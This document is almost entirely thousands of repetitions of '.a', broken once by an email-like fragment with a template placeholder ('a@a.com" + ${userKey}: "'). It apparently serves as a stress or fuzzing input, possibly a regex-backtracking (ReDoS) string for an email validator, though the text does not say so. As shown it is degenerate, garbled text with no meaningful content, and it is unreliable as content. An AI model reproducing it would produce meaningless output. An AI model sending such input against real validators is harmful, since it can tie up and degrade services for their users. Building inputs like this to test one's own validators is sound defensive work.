.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a@a.com" + ${userKey}: "a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.